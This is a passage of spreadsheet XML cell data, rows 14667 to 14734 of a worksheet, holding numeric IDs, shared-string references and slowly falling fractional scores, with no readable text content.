      <c r="C14667" s="2" t="s">
        <v>14137</v>
      </c>
      <c r="D14667" s="2">
        <v>1.0</v>
      </c>
      <c r="E14667" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14667" s="2">
        <v>0.1203703703703703</v>
      </c>
    </row>
    <row r="14668" ht="15.75" customHeight="1">
      <c r="A14668" s="1">
        <v>26191.0</v>
      </c>
      <c r="B14668" s="2">
        <v>1.6223738E7</v>
      </c>
      <c r="C14668" s="2" t="s">
        <v>14138</v>
      </c>
      <c r="D14668" s="2">
        <v>1.0</v>
      </c>
      <c r="E14668" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14668" s="2">
        <v>0.1202804746494067</v>
      </c>
    </row>
    <row r="14669" ht="15.75" customHeight="1">
      <c r="A14669" s="1">
        <v>21957.0</v>
      </c>
      <c r="B14669" s="2">
        <v>2.8988265E7</v>
      </c>
      <c r="C14669" s="2" t="s">
        <v>14139</v>
      </c>
      <c r="D14669" s="2">
        <v>1.0</v>
      </c>
      <c r="E14669" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14669" s="2">
        <v>0.1202020202020202</v>
      </c>
    </row>
    <row r="14670" ht="15.75" customHeight="1">
      <c r="A14670" s="1">
        <v>1947.0</v>
      </c>
      <c r="B14670" s="2">
        <v>3.0224371E7</v>
      </c>
      <c r="C14670" s="2" t="s">
        <v>14140</v>
      </c>
      <c r="D14670" s="2">
        <v>1.0</v>
      </c>
      <c r="E14670" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14670" s="2">
        <v>0.1200396825396826</v>
      </c>
    </row>
    <row r="14671" ht="15.75" customHeight="1">
      <c r="A14671" s="1">
        <v>4116.0</v>
      </c>
      <c r="B14671" s="2">
        <v>4.1353595E7</v>
      </c>
      <c r="C14671" s="2" t="s">
        <v>14141</v>
      </c>
      <c r="D14671" s="2">
        <v>1.0</v>
      </c>
      <c r="E14671" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14671" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="14672" ht="15.75" customHeight="1">
      <c r="A14672" s="1">
        <v>17693.0</v>
      </c>
      <c r="B14672" s="2">
        <v>5.0516751E7</v>
      </c>
      <c r="C14672" s="2" t="s">
        <v>14142</v>
      </c>
      <c r="D14672" s="2">
        <v>1.0</v>
      </c>
      <c r="E14672" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14672" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="14673" ht="15.75" customHeight="1">
      <c r="A14673" s="1">
        <v>22293.0</v>
      </c>
      <c r="B14673" s="2">
        <v>3.3516663E7</v>
      </c>
      <c r="C14673" s="2" t="s">
        <v>14143</v>
      </c>
      <c r="D14673" s="2">
        <v>1.0</v>
      </c>
      <c r="E14673" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14673" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="14674" ht="15.75" customHeight="1">
      <c r="A14674" s="1">
        <v>24896.0</v>
      </c>
      <c r="B14674" s="2">
        <v>1.2283426E7</v>
      </c>
      <c r="C14674" s="2" t="s">
        <v>14144</v>
      </c>
      <c r="D14674" s="2">
        <v>1.0</v>
      </c>
      <c r="E14674" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14674" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="14675" ht="15.75" customHeight="1">
      <c r="A14675" s="1">
        <v>31628.0</v>
      </c>
      <c r="B14675" s="2">
        <v>5144065.0</v>
      </c>
      <c r="C14675" s="2" t="s">
        <v>14145</v>
      </c>
      <c r="D14675" s="2">
        <v>1.0</v>
      </c>
      <c r="E14675" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14675" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="14676" ht="15.75" customHeight="1">
      <c r="A14676" s="1">
        <v>33172.0</v>
      </c>
      <c r="B14676" s="2">
        <v>7086085.0</v>
      </c>
      <c r="C14676" s="2" t="s">
        <v>14145</v>
      </c>
      <c r="D14676" s="2">
        <v>1.0</v>
      </c>
      <c r="E14676" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14676" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="14677" ht="15.75" customHeight="1">
      <c r="A14677" s="1">
        <v>2773.0</v>
      </c>
      <c r="B14677" s="2">
        <v>3.5160905E7</v>
      </c>
      <c r="C14677" s="2" t="s">
        <v>14146</v>
      </c>
      <c r="D14677" s="2">
        <v>1.0</v>
      </c>
      <c r="E14677" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14677" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="14678" ht="15.75" customHeight="1">
      <c r="A14678" s="1">
        <v>19060.0</v>
      </c>
      <c r="B14678" s="2">
        <v>5.4596065E7</v>
      </c>
      <c r="C14678" s="2" t="s">
        <v>14147</v>
      </c>
      <c r="D14678" s="2">
        <v>1.0</v>
      </c>
      <c r="E14678" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14678" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="14679" ht="15.75" customHeight="1">
      <c r="A14679" s="1">
        <v>28163.0</v>
      </c>
      <c r="B14679" s="2">
        <v>2.4927038E7</v>
      </c>
      <c r="C14679" s="2" t="s">
        <v>14148</v>
      </c>
      <c r="D14679" s="2">
        <v>1.0</v>
      </c>
      <c r="E14679" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14679" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="14680" ht="15.75" customHeight="1">
      <c r="A14680" s="1">
        <v>34175.0</v>
      </c>
      <c r="B14680" s="2">
        <v>9932230.0</v>
      </c>
      <c r="C14680" s="2" t="s">
        <v>14149</v>
      </c>
      <c r="D14680" s="2">
        <v>1.0</v>
      </c>
      <c r="E14680" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14680" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="14681" ht="15.75" customHeight="1">
      <c r="A14681" s="1">
        <v>12407.0</v>
      </c>
      <c r="B14681" s="2">
        <v>2.9030463E7</v>
      </c>
      <c r="C14681" s="2" t="s">
        <v>14150</v>
      </c>
      <c r="D14681" s="2">
        <v>1.0</v>
      </c>
      <c r="E14681" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14681" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="14682" ht="15.75" customHeight="1">
      <c r="A14682" s="1">
        <v>18080.0</v>
      </c>
      <c r="B14682" s="2">
        <v>5.1629147E7</v>
      </c>
      <c r="C14682" s="2" t="s">
        <v>14151</v>
      </c>
      <c r="D14682" s="2">
        <v>1.0</v>
      </c>
      <c r="E14682" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14682" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="14683" ht="15.75" customHeight="1">
      <c r="A14683" s="1">
        <v>27853.0</v>
      </c>
      <c r="B14683" s="2">
        <v>2.342753E7</v>
      </c>
      <c r="C14683" s="2" t="s">
        <v>14152</v>
      </c>
      <c r="D14683" s="2">
        <v>1.0</v>
      </c>
      <c r="E14683" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14683" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="14684" ht="15.75" customHeight="1">
      <c r="A14684" s="1">
        <v>14271.0</v>
      </c>
      <c r="B14684" s="2">
        <v>3.8429969E7</v>
      </c>
      <c r="C14684" s="2" t="s">
        <v>14153</v>
      </c>
      <c r="D14684" s="2">
        <v>1.0</v>
      </c>
      <c r="E14684" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14684" s="2">
        <v>0.1195856873822976</v>
      </c>
    </row>
    <row r="14685" ht="15.75" customHeight="1">
      <c r="A14685" s="1">
        <v>25971.0</v>
      </c>
      <c r="B14685" s="2">
        <v>1.5280208E7</v>
      </c>
      <c r="C14685" s="2" t="s">
        <v>14154</v>
      </c>
      <c r="D14685" s="2">
        <v>1.0</v>
      </c>
      <c r="E14685" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14685" s="2">
        <v>0.1195856873822976</v>
      </c>
    </row>
    <row r="14686" ht="15.75" customHeight="1">
      <c r="A14686" s="1">
        <v>1564.0</v>
      </c>
      <c r="B14686" s="2">
        <v>2.7652105E7</v>
      </c>
      <c r="C14686" s="2" t="s">
        <v>14155</v>
      </c>
      <c r="D14686" s="2">
        <v>1.0</v>
      </c>
      <c r="E14686" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14686" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="14687" ht="15.75" customHeight="1">
      <c r="A14687" s="1">
        <v>3950.0</v>
      </c>
      <c r="B14687" s="2">
        <v>4.0663189E7</v>
      </c>
      <c r="C14687" s="2" t="s">
        <v>14156</v>
      </c>
      <c r="D14687" s="2">
        <v>1.0</v>
      </c>
      <c r="E14687" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14687" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="14688" ht="15.75" customHeight="1">
      <c r="A14688" s="1">
        <v>7664.0</v>
      </c>
      <c r="B14688" s="2">
        <v>5.182004E7</v>
      </c>
      <c r="C14688" s="2" t="s">
        <v>14157</v>
      </c>
      <c r="D14688" s="2">
        <v>1.0</v>
      </c>
      <c r="E14688" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14688" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="14689" ht="15.75" customHeight="1">
      <c r="A14689" s="1">
        <v>13433.0</v>
      </c>
      <c r="B14689" s="2">
        <v>3.5097423E7</v>
      </c>
      <c r="C14689" s="2" t="s">
        <v>14158</v>
      </c>
      <c r="D14689" s="2">
        <v>1.0</v>
      </c>
      <c r="E14689" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14689" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="14690" ht="15.75" customHeight="1">
      <c r="A14690" s="1">
        <v>14697.0</v>
      </c>
      <c r="B14690" s="2">
        <v>4.0558152E7</v>
      </c>
      <c r="C14690" s="2" t="s">
        <v>14159</v>
      </c>
      <c r="D14690" s="2">
        <v>1.0</v>
      </c>
      <c r="E14690" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14690" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="14691" ht="15.75" customHeight="1">
      <c r="A14691" s="1">
        <v>26931.0</v>
      </c>
      <c r="B14691" s="2">
        <v>1.9496232E7</v>
      </c>
      <c r="C14691" s="2" t="s">
        <v>14160</v>
      </c>
      <c r="D14691" s="2">
        <v>1.0</v>
      </c>
      <c r="E14691" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14691" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="14692" ht="15.75" customHeight="1">
      <c r="A14692" s="1">
        <v>30635.0</v>
      </c>
      <c r="B14692" s="2">
        <v>4146266.0</v>
      </c>
      <c r="C14692" s="2" t="s">
        <v>14161</v>
      </c>
      <c r="D14692" s="2">
        <v>1.0</v>
      </c>
      <c r="E14692" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14692" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="14693" ht="15.75" customHeight="1">
      <c r="A14693" s="1">
        <v>32788.0</v>
      </c>
      <c r="B14693" s="2">
        <v>6138398.0</v>
      </c>
      <c r="C14693" s="2" t="s">
        <v>14162</v>
      </c>
      <c r="D14693" s="2">
        <v>1.0</v>
      </c>
      <c r="E14693" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14693" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="14694" ht="15.75" customHeight="1">
      <c r="A14694" s="1">
        <v>17005.0</v>
      </c>
      <c r="B14694" s="2">
        <v>4.8423167E7</v>
      </c>
      <c r="C14694" s="2" t="s">
        <v>14163</v>
      </c>
      <c r="D14694" s="2">
        <v>1.0</v>
      </c>
      <c r="E14694" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14694" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="14695" ht="15.75" customHeight="1">
      <c r="A14695" s="1">
        <v>24625.0</v>
      </c>
      <c r="B14695" s="2">
        <v>1.1462092E7</v>
      </c>
      <c r="C14695" s="2" t="s">
        <v>14164</v>
      </c>
      <c r="D14695" s="2">
        <v>1.0</v>
      </c>
      <c r="E14695" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14695" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="14696" ht="15.75" customHeight="1">
      <c r="A14696" s="1">
        <v>762.0</v>
      </c>
      <c r="B14696" s="2">
        <v>2.1018491E7</v>
      </c>
      <c r="C14696" s="2" t="s">
        <v>14165</v>
      </c>
      <c r="D14696" s="2">
        <v>1.0</v>
      </c>
      <c r="E14696" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14696" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="14697" ht="15.75" customHeight="1">
      <c r="A14697" s="1">
        <v>3683.0</v>
      </c>
      <c r="B14697" s="2">
        <v>3.9464039E7</v>
      </c>
      <c r="C14697" s="2" t="s">
        <v>14166</v>
      </c>
      <c r="D14697" s="2">
        <v>1.0</v>
      </c>
      <c r="E14697" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14697" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="14698" ht="15.75" customHeight="1">
      <c r="A14698" s="1">
        <v>5389.0</v>
      </c>
      <c r="B14698" s="2">
        <v>4.5442758E7</v>
      </c>
      <c r="C14698" s="2" t="s">
        <v>14167</v>
      </c>
      <c r="D14698" s="2">
        <v>1.0</v>
      </c>
      <c r="E14698" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14698" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="14699" ht="15.75" customHeight="1">
      <c r="A14699" s="1">
        <v>7088.0</v>
      </c>
      <c r="B14699" s="2">
        <v>5.0290737E7</v>
      </c>
      <c r="C14699" s="2" t="s">
        <v>14168</v>
      </c>
      <c r="D14699" s="2">
        <v>1.0</v>
      </c>
      <c r="E14699" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14699" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="14700" ht="15.75" customHeight="1">
      <c r="A14700" s="1">
        <v>7282.0</v>
      </c>
      <c r="B14700" s="2">
        <v>5.0788896E7</v>
      </c>
      <c r="C14700" s="2" t="s">
        <v>14169</v>
      </c>
      <c r="D14700" s="2">
        <v>1.0</v>
      </c>
      <c r="E14700" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14700" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="14701" ht="15.75" customHeight="1">
      <c r="A14701" s="1">
        <v>8596.0</v>
      </c>
      <c r="B14701" s="2">
        <v>5.4246465E7</v>
      </c>
      <c r="C14701" s="2" t="s">
        <v>14170</v>
      </c>
      <c r="D14701" s="2">
        <v>1.0</v>
      </c>
      <c r="E14701" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14701" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="14702" ht="15.75" customHeight="1">
      <c r="A14702" s="1">
        <v>9100.0</v>
      </c>
      <c r="B14702" s="2">
        <v>5.5162349E7</v>
      </c>
      <c r="C14702" s="2" t="s">
        <v>14171</v>
      </c>
      <c r="D14702" s="2">
        <v>1.0</v>
      </c>
      <c r="E14702" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14702" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="14703" ht="15.75" customHeight="1">
      <c r="A14703" s="1">
        <v>9489.0</v>
      </c>
      <c r="B14703" s="2">
        <v>5.5910891E7</v>
      </c>
      <c r="C14703" s="2" t="s">
        <v>14172</v>
      </c>
      <c r="D14703" s="2">
        <v>1.0</v>
      </c>
      <c r="E14703" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14703" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="14704" ht="15.75" customHeight="1">
      <c r="A14704" s="1">
        <v>9919.0</v>
      </c>
      <c r="B14704" s="2">
        <v>5.6806348E7</v>
      </c>
      <c r="C14704" s="2" t="s">
        <v>14173</v>
      </c>
      <c r="D14704" s="2">
        <v>1.0</v>
      </c>
      <c r="E14704" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14704" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="14705" ht="15.75" customHeight="1">
      <c r="A14705" s="1">
        <v>11964.0</v>
      </c>
      <c r="B14705" s="2">
        <v>2.566794E7</v>
      </c>
      <c r="C14705" s="2" t="s">
        <v>14174</v>
      </c>
      <c r="D14705" s="2">
        <v>1.0</v>
      </c>
      <c r="E14705" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14705" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="14706" ht="15.75" customHeight="1">
      <c r="A14706" s="1">
        <v>14376.0</v>
      </c>
      <c r="B14706" s="2">
        <v>3.8987696E7</v>
      </c>
      <c r="C14706" s="2" t="s">
        <v>14175</v>
      </c>
      <c r="D14706" s="2">
        <v>1.0</v>
      </c>
      <c r="E14706" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14706" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="14707" ht="15.75" customHeight="1">
      <c r="A14707" s="1">
        <v>15447.0</v>
      </c>
      <c r="B14707" s="2">
        <v>4.3033427E7</v>
      </c>
      <c r="C14707" s="2" t="s">
        <v>14176</v>
      </c>
      <c r="D14707" s="2">
        <v>1.0</v>
      </c>
      <c r="E14707" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14707" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="14708" ht="15.75" customHeight="1">
      <c r="A14708" s="1">
        <v>16330.0</v>
      </c>
      <c r="B14708" s="2">
        <v>4.600641E7</v>
      </c>
      <c r="C14708" s="2" t="s">
        <v>14177</v>
      </c>
      <c r="D14708" s="2">
        <v>1.0</v>
      </c>
      <c r="E14708" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14708" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="14709" ht="15.75" customHeight="1">
      <c r="A14709" s="1">
        <v>17537.0</v>
      </c>
      <c r="B14709" s="2">
        <v>5.0113376E7</v>
      </c>
      <c r="C14709" s="2" t="s">
        <v>14178</v>
      </c>
      <c r="D14709" s="2">
        <v>1.0</v>
      </c>
      <c r="E14709" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14709" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="14710" ht="15.75" customHeight="1">
      <c r="A14710" s="1">
        <v>18654.0</v>
      </c>
      <c r="B14710" s="2">
        <v>5.3481928E7</v>
      </c>
      <c r="C14710" s="2" t="s">
        <v>14179</v>
      </c>
      <c r="D14710" s="2">
        <v>1.0</v>
      </c>
      <c r="E14710" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14710" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="14711" ht="15.75" customHeight="1">
      <c r="A14711" s="1">
        <v>22252.0</v>
      </c>
      <c r="B14711" s="2">
        <v>3.2789026E7</v>
      </c>
      <c r="C14711" s="2" t="s">
        <v>14180</v>
      </c>
      <c r="D14711" s="2">
        <v>1.0</v>
      </c>
      <c r="E14711" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14711" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="14712" ht="15.75" customHeight="1">
      <c r="A14712" s="1">
        <v>31066.0</v>
      </c>
      <c r="B14712" s="2">
        <v>4.8147734E7</v>
      </c>
      <c r="C14712" s="2" t="s">
        <v>14181</v>
      </c>
      <c r="D14712" s="2">
        <v>1.0</v>
      </c>
      <c r="E14712" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14712" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="14713" ht="15.75" customHeight="1">
      <c r="A14713" s="1">
        <v>175.0</v>
      </c>
      <c r="B14713" s="2">
        <v>1.3970119E7</v>
      </c>
      <c r="C14713" s="2" t="s">
        <v>14182</v>
      </c>
      <c r="D14713" s="2">
        <v>1.0</v>
      </c>
      <c r="E14713" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14713" s="2">
        <v>0.1193078324225865</v>
      </c>
    </row>
    <row r="14714" ht="15.75" customHeight="1">
      <c r="A14714" s="1">
        <v>2236.0</v>
      </c>
      <c r="B14714" s="2">
        <v>3.2283135E7</v>
      </c>
      <c r="C14714" s="2" t="s">
        <v>14183</v>
      </c>
      <c r="D14714" s="2">
        <v>1.0</v>
      </c>
      <c r="E14714" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14714" s="2">
        <v>0.1193078324225865</v>
      </c>
    </row>
    <row r="14715" ht="15.75" customHeight="1">
      <c r="A14715" s="1">
        <v>7577.0</v>
      </c>
      <c r="B14715" s="2">
        <v>5.1592497E7</v>
      </c>
      <c r="C14715" s="2" t="s">
        <v>14184</v>
      </c>
      <c r="D14715" s="2">
        <v>1.0</v>
      </c>
      <c r="E14715" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14715" s="2">
        <v>0.1193078324225865</v>
      </c>
    </row>
    <row r="14716" ht="15.75" customHeight="1">
      <c r="A14716" s="1">
        <v>18628.0</v>
      </c>
      <c r="B14716" s="2">
        <v>5.3380198E7</v>
      </c>
      <c r="C14716" s="2" t="s">
        <v>14185</v>
      </c>
      <c r="D14716" s="2">
        <v>1.0</v>
      </c>
      <c r="E14716" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14716" s="2">
        <v>0.1193078324225865</v>
      </c>
    </row>
    <row r="14717" ht="15.75" customHeight="1">
      <c r="A14717" s="1">
        <v>13529.0</v>
      </c>
      <c r="B14717" s="2">
        <v>3.5548088E7</v>
      </c>
      <c r="C14717" s="2" t="s">
        <v>14186</v>
      </c>
      <c r="D14717" s="2">
        <v>1.0</v>
      </c>
      <c r="E14717" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14717" s="2">
        <v>0.1191756272401434</v>
      </c>
    </row>
    <row r="14718" ht="15.75" customHeight="1">
      <c r="A14718" s="1">
        <v>13695.0</v>
      </c>
      <c r="B14718" s="2">
        <v>3.6142037E7</v>
      </c>
      <c r="C14718" s="2" t="s">
        <v>14187</v>
      </c>
      <c r="D14718" s="2">
        <v>1.0</v>
      </c>
      <c r="E14718" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14718" s="2">
        <v>0.1191756272401434</v>
      </c>
    </row>
    <row r="14719" ht="15.75" customHeight="1">
      <c r="A14719" s="1">
        <v>13192.0</v>
      </c>
      <c r="B14719" s="2">
        <v>3.4087163E7</v>
      </c>
      <c r="C14719" s="2" t="s">
        <v>14188</v>
      </c>
      <c r="D14719" s="2">
        <v>1.0</v>
      </c>
      <c r="E14719" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14719" s="2">
        <v>0.1186868686868687</v>
      </c>
    </row>
    <row r="14720" ht="15.75" customHeight="1">
      <c r="A14720" s="1">
        <v>3170.0</v>
      </c>
      <c r="B14720" s="2">
        <v>3.704348E7</v>
      </c>
      <c r="C14720" s="2" t="s">
        <v>14189</v>
      </c>
      <c r="D14720" s="2">
        <v>1.0</v>
      </c>
      <c r="E14720" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14720" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="14721" ht="15.75" customHeight="1">
      <c r="A14721" s="1">
        <v>3907.0</v>
      </c>
      <c r="B14721" s="2">
        <v>4.0486329E7</v>
      </c>
      <c r="C14721" s="2" t="s">
        <v>14190</v>
      </c>
      <c r="D14721" s="2">
        <v>1.0</v>
      </c>
      <c r="E14721" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14721" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="14722" ht="15.75" customHeight="1">
      <c r="A14722" s="1">
        <v>11740.0</v>
      </c>
      <c r="B14722" s="2">
        <v>2.405194E7</v>
      </c>
      <c r="C14722" s="2" t="s">
        <v>14191</v>
      </c>
      <c r="D14722" s="2">
        <v>1.0</v>
      </c>
      <c r="E14722" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14722" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="14723" ht="15.75" customHeight="1">
      <c r="A14723" s="1">
        <v>12964.0</v>
      </c>
      <c r="B14723" s="2">
        <v>3.2515046E7</v>
      </c>
      <c r="C14723" s="2" t="s">
        <v>14192</v>
      </c>
      <c r="D14723" s="2">
        <v>1.0</v>
      </c>
      <c r="E14723" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14723" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="14724" ht="15.75" customHeight="1">
      <c r="A14724" s="1">
        <v>13619.0</v>
      </c>
      <c r="B14724" s="2">
        <v>3.5868959E7</v>
      </c>
      <c r="C14724" s="2" t="s">
        <v>14193</v>
      </c>
      <c r="D14724" s="2">
        <v>1.0</v>
      </c>
      <c r="E14724" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14724" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="14725" ht="15.75" customHeight="1">
      <c r="A14725" s="1">
        <v>13801.0</v>
      </c>
      <c r="B14725" s="2">
        <v>3.6648368E7</v>
      </c>
      <c r="C14725" s="2" t="s">
        <v>14194</v>
      </c>
      <c r="D14725" s="2">
        <v>1.0</v>
      </c>
      <c r="E14725" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14725" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="14726" ht="15.75" customHeight="1">
      <c r="A14726" s="1">
        <v>14703.0</v>
      </c>
      <c r="B14726" s="2">
        <v>4.0579423E7</v>
      </c>
      <c r="C14726" s="2" t="s">
        <v>14195</v>
      </c>
      <c r="D14726" s="2">
        <v>1.0</v>
      </c>
      <c r="E14726" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14726" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="14727" ht="15.75" customHeight="1">
      <c r="A14727" s="1">
        <v>17095.0</v>
      </c>
      <c r="B14727" s="2">
        <v>4.8665359E7</v>
      </c>
      <c r="C14727" s="2" t="s">
        <v>14196</v>
      </c>
      <c r="D14727" s="2">
        <v>1.0</v>
      </c>
      <c r="E14727" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14727" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="14728" ht="15.75" customHeight="1">
      <c r="A14728" s="1">
        <v>26378.0</v>
      </c>
      <c r="B14728" s="2">
        <v>1.6969316E7</v>
      </c>
      <c r="C14728" s="2" t="s">
        <v>14197</v>
      </c>
      <c r="D14728" s="2">
        <v>1.0</v>
      </c>
      <c r="E14728" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14728" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="14729" ht="15.75" customHeight="1">
      <c r="A14729" s="1">
        <v>31402.0</v>
      </c>
      <c r="B14729" s="2">
        <v>4999496.0</v>
      </c>
      <c r="C14729" s="2" t="s">
        <v>14198</v>
      </c>
      <c r="D14729" s="2">
        <v>1.0</v>
      </c>
      <c r="E14729" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14729" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="14730" ht="15.75" customHeight="1">
      <c r="A14730" s="1">
        <v>31411.0</v>
      </c>
      <c r="B14730" s="2">
        <v>5006726.0</v>
      </c>
      <c r="C14730" s="2" t="s">
        <v>14199</v>
      </c>
      <c r="D14730" s="2">
        <v>1.0</v>
      </c>
      <c r="E14730" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14730" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="14731" ht="15.75" customHeight="1">
      <c r="A14731" s="1">
        <v>18320.0</v>
      </c>
      <c r="B14731" s="2">
        <v>5.2396267E7</v>
      </c>
      <c r="C14731" s="2" t="s">
        <v>14200</v>
      </c>
      <c r="D14731" s="2">
        <v>1.0</v>
      </c>
      <c r="E14731" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14731" s="2">
        <v>0.1183574879227054</v>
      </c>
    </row>
    <row r="14732" ht="15.75" customHeight="1">
      <c r="A14732" s="1">
        <v>9007.0</v>
      </c>
      <c r="B14732" s="2">
        <v>5.4974902E7</v>
      </c>
      <c r="C14732" s="2" t="s">
        <v>14201</v>
      </c>
      <c r="D14732" s="2">
        <v>1.0</v>
      </c>
      <c r="E14732" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14732" s="2">
        <v>0.1183574879227053</v>
      </c>
    </row>
    <row r="14733" ht="15.75" customHeight="1">
      <c r="A14733" s="1">
        <v>13802.0</v>
      </c>
      <c r="B14733" s="2">
        <v>3.6648368E7</v>
      </c>
      <c r="C14733" s="2" t="s">
        <v>14202</v>
      </c>
      <c r="D14733" s="2">
        <v>1.0</v>
      </c>
      <c r="E14733" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14733" s="2">
        <v>0.1183127572016461</v>
      </c>
    </row>
    <row r="14734" ht="15.75" customHeight="1">
      <c r="A14734" s="1">
        <v>17681.0</v>
      </c>
      <c r="B14734" s="2">
        <v>5.0496741E7</v>
      </c>
